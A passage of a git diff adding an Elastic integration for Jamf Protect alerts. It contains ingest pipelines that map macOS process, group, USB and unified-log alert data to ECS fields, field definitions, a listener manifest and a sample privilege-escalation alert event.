{ + ctx.process.exit_code = process.exitCode; + } + ctx.process.args = process.args ?: new ArrayList(); + ctx.process.tty = process.tty; + ctx.process.entity_id = process.uuid; + + ctx.process.parent = new HashMap(); + ctx.process.parent.pid = process.responsiblePID; + + ctx.process.user = new HashMap(); + ctx.process.user.id = process.uid.toString(); + + ctx.process.group_leader = new HashMap(); + if (process?.pgid != null) { + ctx.process.group_leader.pid = process.pgid; + } + ctx.process.group_leader.group = new HashMap(); + if (process?.gid != null) { + ctx.process.group_leader.group.id = process.gid.toString(); + } + + ctx.process.real_user = new HashMap(); + if (process?.ruid != null) { + ctx.process.real_user.id = process.ruid.toString(); + } + + ctx.process.real_group = new HashMap(); + if (process?.rgid != null) { + ctx.process.real_group.id = process.rgid.toString(); + } + + ctx.process.hash = ctx.process.hash ?: new HashMap(); + if (binary?.sha1hex != null) { + ctx.process.hash.sha1 = binary.sha1hex; + } + if (binary?.sha256hex != null) { + ctx.process.hash.sha256 = binary.sha256hex; + } + + ctx.process.code_signature = ctx.process.code_signature ?: new HashMap(); + if (process.signingInfo?.appid != null) { + ctx.process.code_signature.signing_id = process.signingInfo.appid; + } + if (process.signingInfo?.statusMessage != null) { + ctx.process.code_signature.status = process.signingInfo.statusMessage; + } + if (process?.signingInfo?.teamid != null) { + ctx.process.code_signature.team_id = process.signingInfo.teamid; + } + + // Mapping out the parent process + if (ctx.jamf_protect.alerts.input.related.processes.size() > 1) { + def parentProcess = ctx.jamf_protect.alerts.input.related.processes[1]; + + ctx.process.parent = new HashMap(); + ctx.process.parent.name = parentProcess.name; + ctx.process.parent.pid = parentProcess.pid; + ctx.process.parent.executable = parentProcess.path; + ctx.process.parent.entity_id = parentProcess.uuid; + + if (parentProcess.containsKey('startTimestamp')) { + ctx.process.parent.start = Instant.ofEpochSecond(parentProcess.startTimestamp).toString(); + } + + ctx.process.parent.user = new HashMap(); + if (parentProcess?.uid != null) { + ctx.process.parent.user.id = parentProcess.uid.toString(); + } + + ctx.process.parent.real_user = new HashMap(); + if (parentProcess?.ruid != null) { + ctx.process.parent.real_user.id = parentProcess.ruid.toString(); + } + + ctx.process.parent.real_group = new HashMap(); + if (parentProcess?.rgid != null) { + ctx.process.parent.real_group.id = parentProcess.rgid.toString(); + } + + ctx.process.parent.code_signature = ctx.process.parent.code_signature ?: new HashMap(); + if (parentProcess.signingInfo?.appid != null) { + ctx.process.parent.code_signature.signing_id = parentProcess.signingInfo.appid; + } + if (parentProcess.signingInfo?.statusMessage != null) { + ctx.process.parent.code_signature.status = parentProcess.signingInfo.statusMessage; + } + if (parentProcess?.signingInfo?.teamid != null) { + ctx.process.parent.code_signature.team_id = parentProcess.signingInfo.teamid; + } + + } + + // Mapping out the process group leader, which can be the same as parent + def processGroupLeader = ctx.jamf_protect.alerts.input.related.processes[ctx.jamf_protect.alerts.input.related.processes.size() - 1]; + ctx.process.group_leader = new HashMap(); + ctx.process.group_leader.name = processGroupLeader.name; + ctx.process.group_leader.pid = processGroupLeader.pid; + ctx.process.group_leader.executable = processGroupLeader.path; + + if (processGroupLeader.containsKey('startTimestamp')) { + ctx.process.group_leader.start = Instant.ofEpochSecond(processGroupLeader.startTimestamp).toString(); + } + + ctx.process.group_leader.user = new HashMap(); + if (processGroupLeader?.uid != null) { + ctx.process.group_leader.user.id = processGroupLeader.uid.toString(); + } + + ctx.process.group_leader.real_user = new HashMap(); + if (processGroupLeader?.ruid != null) { + ctx.process.group_leader.real_user.id = processGroupLeader.ruid.toString(); + } + + ctx.process.group_leader.real_group = new HashMap(); + if (processGroupLeader?.rgid != null) { + ctx.process.group_leader.real_group.id = processGroupLeader.rgid.toString(); + } + } + +###################### +## ECS Group Mapping ## +###################### + - script: + description: One scripting processor to capture all the related group information for the event. + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.related?.groups != null && ctx.jamf_protect.alerts.input.related.groups.size() > 0) { + def group = ctx.jamf_protect.alerts.input.related.groups[0]; + + ctx.group = ctx.group ?: new HashMap(); + + ctx.group.name = group.name; + ctx.group.id = group.gid.toString(); + } + +######################## +# ECS Threat Mapping ## +######################## + - set: + field: threat.framework + value: "MITRE ATT&CK" + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].tags.contains("MITREattack") + - set: + field: threat.software.platforms + value: macOS + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].tags.contains("MITREattack") + +######################## +# ECS Related Mapping ## +######################## + - append: + field: related.hosts + value: "{{ host.name }}" + if: ctx.host?.name != null + allow_duplicates: false + - append: + field: related.user + value: "{{ user.name }}" + if: ctx.user?.name != null + allow_duplicates: false + # - append: + # field: related.ip + # value: "{{ host.ip }}" + # if: ctx.host?.ip != null + # allow_duplicates: false + - foreach: + field: host.ip + if: ctx.host?.ip instanceof List + processor: + append: + field: related.ip + value: '{{{_ingest._value}}}' + allow_duplicates: false + - append: + field: related.hash + value: "{{ file.hash.sha1 }}" + if: ctx.file?.hash?.sha1 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ file.hash.sha256 }}" + if: ctx.file?.hash?.sha256 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ process.hash.sha1 }}" + if: ctx.process?.hash?.sha1 != null + allow_duplicates: false + - append: + field: related.hash + value: "{{ process.hash.sha256 }}" + if: ctx.process?.hash?.sha256 != null + allow_duplicates: false + + +####################### +## ECS pipelines ## +####################### + - pipeline: + name: '{{ IngestPipeline "gpusbevent" }}' + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" + - pipeline: + name: '{{ IngestPipeline "gpunifiedlogevent" }}' + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" + + +############# +## Cleanup ## +############# + - remove: + field: + - jamf_protect.alerts + - jamf_protect + - message + ignore_missing: true + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml new file mode 100644 index 00000000000..7972a47e4f7 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpunifiedlogevent.yml @@ -0,0 +1,29 @@ +--- +description: Pipeline for processing GPUnifiedLogEvent events. +processors: + +###################### +## ECS Log Mapping ## +###################### + - rename: + field: jamf_protect.alerts.input.match.event.process + target_field: process.name + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.process != null + - rename: + field: jamf_protect.alerts.input.match.event.processIdentifier + target_field: process.pid + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.processIdentifier != null + - date: + field: jamf_protect.alerts.input.match.event.timestamp + target_field: process.start + formats: + - UNIX + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUnifiedLogEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.timestamp != null + +on_failure: +- set: + field: event.kind + value: pipeline_error +- append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml new file mode 100644 index 00000000000..c8cd62db537 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/gpusbevent.yml @@ -0,0 +1,59 @@ +--- +description: Pipeline for processing GPUSBEvent events. +processors: + +###################### +## ECS Volume Mapping ## +###################### + - rename: + field: jamf_protect.alerts.input.match.event.device.bsdName + target_field: volume.nt_name + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.bsdName != null + - rename: + field: jamf_protect.alerts.input.match.event.device.content + target_field: volume.file_system_type + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.content != null + - rename: + field: jamf_protect.alerts.input.match.event.device.busName + target_field: volume.bus_type + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.busName != null + - rename: + field: jamf_protect.alerts.input.match.event.device.productName + target_field: volume.product_name + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.productName != null + - rename: + field: jamf_protect.alerts.input.match.event.device.productId + target_field: volume.product_id + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.productId != null + - rename: + field: jamf_protect.alerts.input.match.event.device.isRemovable + target_field: volume.removable + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.isRemovable != null + - rename: + field: jamf_protect.alerts.input.match.event.device.serialNumber + target_field: volume.serial_number + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.serialNumber != null + - rename: + field: jamf_protect.alerts.input.match.event.device.size + target_field: volume.size + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.size != null + - rename: + field: jamf_protect.alerts.input.match.event.device.vendorId + target_field: volume.vendor_id + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.vendorId != null + - rename: + field: jamf_protect.alerts.input.match.event.device.vendorName + target_field: volume.vendor_name + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.vendorName != null + - rename: + field: jamf_protect.alerts.input.match.event.device.isWritable + target_field: volume.writable + if: ctx.jamf_protect?.alerts?.input?.eventType == "GPUSBEvent" && ctx.jamf_protect?.alerts?.input?.match?.event?.device?.isWritable != null + +on_failure: +- set: + field: event.kind + value: pipeline_error +- append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml b/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml new file mode 100644 index 00000000000..af87680a01f --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.dataset + type: constant_keyword + description: Name of the dataset. + value: jamf_protect.alerts +- name: event.module + type: constant_keyword + description: Event module. + value: jamf_protect diff --git a/packages/jamf_protect/data_stream/alerts/fields/ecs.yml b/packages/jamf_protect/data_stream/alerts/fields/ecs.yml new file mode 100644 index 00000000000..48cc9ae7280 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/fields/ecs.yml @@ -0,0 +1,314 @@ +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.created +- external: ecs + name: event.code +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.outcome +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.category +- external: ecs + name: event.id +- external: ecs + name: event.timezone +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: user.name +- external: ecs + name: user.domain +- external: ecs + name: user.email +- external: ecs + name: related.hosts +- external: ecs + name: related.hash +- external: ecs + name: process.args +- external: ecs + name: process.args_count +- external: ecs + name: process.command_line +- external: ecs + name: process.executable +- external: ecs + name: process.parent.pid +- external: ecs + name: process.group_leader.group.id +- external: ecs + name: process.real_group.id +- external: ecs + name: process.parent.real_group.id +- external: ecs + name: process.group_leader.real_group.id +- external: ecs + name: process.entity_id +- external: ecs + name: process.real_user.id +- external: ecs + name: process.parent.real_user.id +- external: ecs + name: process.group_leader.real_user.id +- external: ecs + name: process.user.id +- external: ecs + name: process.parent.user.id +- external: ecs + name: process.group_leader.user.id +- external: ecs + name: process.tty +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.exit_code +- external: ecs + name: process.executable +- external: ecs + name: process.name +- external: ecs + name: process.pid +- external: ecs + name: process.hash.md5 +- external: ecs + name: process.hash.sha1 +- external: ecs + name: process.hash.sha256 +- external: ecs + name: process.code_signature.signing_id +- external: ecs + name: process.code_signature.status +- external: ecs + name: process.code_signature.team_id +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: file.gid +- external: ecs + name: file.inode +- external: ecs + name: file.mode +- external: ecs + name: file.size +- external: ecs + name: file.uid +- external: ecs + name: file.code_signature.signing_id +- external: ecs + name: file.code_signature.status +- external: ecs + name: file.code_signature.team_id +- external: ecs + name: destination.address +- external: ecs + name: destination.as.number +- external: ecs + name: destination.as.organization.name +- external: ecs + name: destination.domain +- external: ecs + name: destination.geo.continent_name +- external: ecs + name: destination.geo.country_iso_code +- external: ecs + name: destination.geo.city_name +- external: ecs + name: destination.geo.country_name +- external: ecs + name: destination.geo.location +- external: ecs + name: destination.ip +- external: ecs + name: destination.port +- external: ecs + name: network.direction +- external: ecs + name: network.transport +- external: ecs + name: source.ip +- external: ecs + name: source.port +- external: ecs + name: tags +- external: ecs + name: threat.tactic.id +- external: ecs + name: threat.tactic.reference +- external: ecs + name: threat.tactic.name +- external: ecs + name: threat.technique.id +- external: ecs + name: threat.technique.name +- external: ecs + name: threat.technique.reference +- external: ecs + name: threat.enrichments +- external: ecs + name: threat.software.platforms +- external: ecs + name: container.image.tag +- external: ecs + name: container.runtime +- external: ecs + name: ecs.version +- external: ecs + name: error.message +- external: ecs + name: event.action +- external: ecs + name: event.category +- external: ecs + name: event.created +- external: ecs + name: event.duration +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.provider +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: event.type +- external: ecs + name: file.extension +- external: ecs + name: file.hash.md5 +- external: ecs + name: file.hash.sha1 +- external: ecs + name: file.hash.sha256 +- external: ecs + name: file.hash.sha512 +- external: ecs + name: file.name +- external: ecs + name: file.path +- external: ecs + name: log.file.path +- external: ecs + name: log.logger +- external: ecs + name: message +- external: ecs + name: observer.name +- external: ecs + name: observer.product +- external: ecs + name: observer.type +- external: ecs + name: observer.vendor +- external: ecs + name: process.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.name +- external: ecs + name: process.parent.executable +- external: ecs + name: process.parent.entity_id +- external: ecs + name: process.parent.start +- external: ecs + name: process.parent.code_signature.signing_id +- external: ecs + name: process.parent.code_signature.status +- external: ecs + name: process.parent.code_signature.team_id +- external: ecs + name: process.group_leader.pid +- external: ecs + name: process.group_leader.name +- external: ecs + name: process.group_leader.executable +- external: ecs + name: process.group_leader.start +- external: ecs + name: process.pid +- external: ecs + name: process.start +- external: ecs + name: process.parent.start +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.ip +- external: ecs + name: related.user +- external: ecs + name: rule.description +- external: ecs + name: rule.name +- external: ecs + name: tags +- external: ecs + name: threat.framework +- external: ecs + name: threat.technique.name +- external: ecs + name: user.domain +- external: ecs + name: user.id +- external: ecs + name: user.name +- external: ecs + name: group.id +- external: ecs + name: group.name +- name: volume.file_system_type + type: keyword +- name: volume.bus_type + type: keyword +- name: volume.nt_name + type: keyword +- name: volume.product_id + type: keyword +- name: volume.product_name + type: keyword +- name: volume.removable + type: boolean +- name: volume.serial_number + type: keyword +- name: volume.size + type: long +- name: volume.vendor_id + type: keyword +- name: volume.vendor_name + type: keyword +- name: volume.writable + type: boolean diff --git a/packages/jamf_protect/data_stream/alerts/fields/fields.yml b/packages/jamf_protect/data_stream/alerts/fields/fields.yml new file mode 100644 index 00000000000..8fbed644933 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/fields/fields.yml @@ -0,0 +1,9 @@ +- name: jamf_protect.alerts + type: group + release: beta + fields: + - name: timestamp_nanoseconds + type: date + description: > + The timestamp in Epoch nanoseconds. + diff --git a/packages/jamf_protect/data_stream/alerts/manifest.yml b/packages/jamf_protect/data_stream/alerts/manifest.yml new file mode 100644 index 00000000000..c0779da9653 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/manifest.yml @@ -0,0 +1,57 @@ +title: Receives Alerts from Jamf Protect with Elastic Agent. +type: logs +streams: + - input: http_endpoint + template_path: http_endpoint.yml.hbs + title: Jamf Protect Alerts + description: Receives Alerts from Jamf Protect with Elastic Agent. + vars: + - name: listen_port + type: integer + title: Listen Port + description: The port number the listener binds to. + multi: false + required: true + show_user: true + default: 9551 + - name: url + type: text + title: URL + description: This option specifies which URL path to accept requests on. Defaults to /. + multi: false + required: false + show_user: false + default: / + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - jamf_protect-alerts + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: true + title: Preserve duplicate custom fields + description: Preserve custom fields for all ECS mappings. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. diff --git a/packages/jamf_protect/data_stream/alerts/sample_event.json b/packages/jamf_protect/data_stream/alerts/sample_event.json new file mode 100644 index 00000000000..3f3467b0414 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/sample_event.json @@ -0,0 +1,133 @@ +{ + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "User Elevated Action", + "category": [ + "host", + "process" + ], + "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4", + "kind": "alert", + "module": "jamf_protect", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "Application used deprecated elevation API", + "severity": 0, + "start": "2023-11-01T12:20:38.851Z", + "type": [ + "start" + ] + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "192.168.11.226" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "message": "{\"caid\":\"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7\",\"certid\":\"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea\",\"input\":{\"host\":{\"os\":\"Version 14.0 (Build 23A344)\",\"ips\":[\"192.168.11.226\"],\"serial\":\"Z2C23RW4DY\",\"hostname\":\"VMAC-2C23RW4DY\",\"protectVersion\":\"5.1.0.4\",\"provisioningUDID\":\"0000FE00-8406CE28ECFC4DAB\"},\"match\":{\"tags\":[\"MITREattack\",\"DefenseEvasion\",\"T1548.004\",\"AbuseElevationControlMechanism\",\"PrivilegeEscalation\"],\"uuid\":\"7232d4a4-2289-49ba-a218-215ef3d62ec4\",\"event\":{\"pid\":3136,\"type\":1,\"uuid\":\"e19385fc-6077-4d00-ad56-b89eec15e730\",\"subType\":7,\"timestamp\":1698841238.851668},\"facts\":[{\"name\":\"User Elevated Action\",\"tags\":[\"DefenseEvasion\",\"T1548.004\",\"PrivilegeEscalation\",\"MITREattack\",\"AbuseElevationControlMechanism\"],\"uuid\":\"db094865-99c2-416c-9f06-e7740d9e8a20\",\"human\":\"Application used deprecated elevation API\",\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"version\":1,\"severity\":0}],\"custom\":false,\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"severity\":0},\"related\":{\"files\":[],\"users\":[{\"uid\":0,\"name\":\"root\",\"uuid\":\"Z2C23RW4DY0\"},{\"uid\":501,\"name\":\"local-admin\",\"uuid\":\"Z2C23RW4DY1f5\"}],\"groups\":[{\"gid\":0,\"name\":\"wheel\",\"uuid\":\"Z2C23RW4DY0\"},{\"gid\":20,\"name\":\"staff\",\"uuid\":\"Z2C23RW4DY14\"}],\"binaries\":[{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35273,\"path\":\"/usr/libexec/security_authtrampoline\",\"size\":134768,\"inode\":1152921500312504800,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"82e899cb1c8a42b74653b05ca526d5feae92b9f6\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"size\":6929392,\"inode\":4631313,\"xattrs\":[],\"changed\":1698101729,\"created\":1697718684,\"sha1hex\":\"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3\",\"accessed\":1698818094,\"modified\":1697718684,\"sha256hex\":\"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35145,\"path\":\"/usr/bin/sudo\",\"size\":1446192,\"inode\":1152921500312502700,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"8e860430a91946640dcc5161c726a39dc8576cc3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33133,\"path\":\"/bin/bash\",\"size\":1310224,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/bin/zsh\",\"size\":1377584,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"959ade1e4967a51eb8757d723d5040090fdfcb5c\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35181,\"path\":\"/usr/bin/login\",\"size\":172032,\"inode\":1152921500312502100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"875c999ee4df1a16d7654636714f852f55d1cc57\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"size\":2222656,\"inode\":1152921500311913100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"14c2df1ea5a91fed7527fcfdff74268e19524eb3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false}],\"processes\":[{\"gid\":0,\"pid\":3136,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/usr/libexec/security_authtrampoline\",\"/Library/Application Support/JAMF/Remote Assist/Wipe\",\"auth 16\"],\"name\":\"security_authtrampoline\",\"path\":\"/usr/libexec/security_authtrampoline\",\"pgid\":3096,\"ppid\":3099,\"rgid\":0,\"ruid\":0,\"uuid\":\"c821d617-2ce5-4475-aae6-c428a1ad9e8c\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841238,\"originalParentPID\":3099,\"processIdentifier\":6750},{\"gid\":0,\"pid\":3099,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"jamfRemoteAssistLauncher\",\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"pgid\":3096,\"ppid\":3098,\"rgid\":0,\"ruid\":0,\"uuid\":\"a382cfda-8964-4388-8c19-49d4eaef2ae7\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software 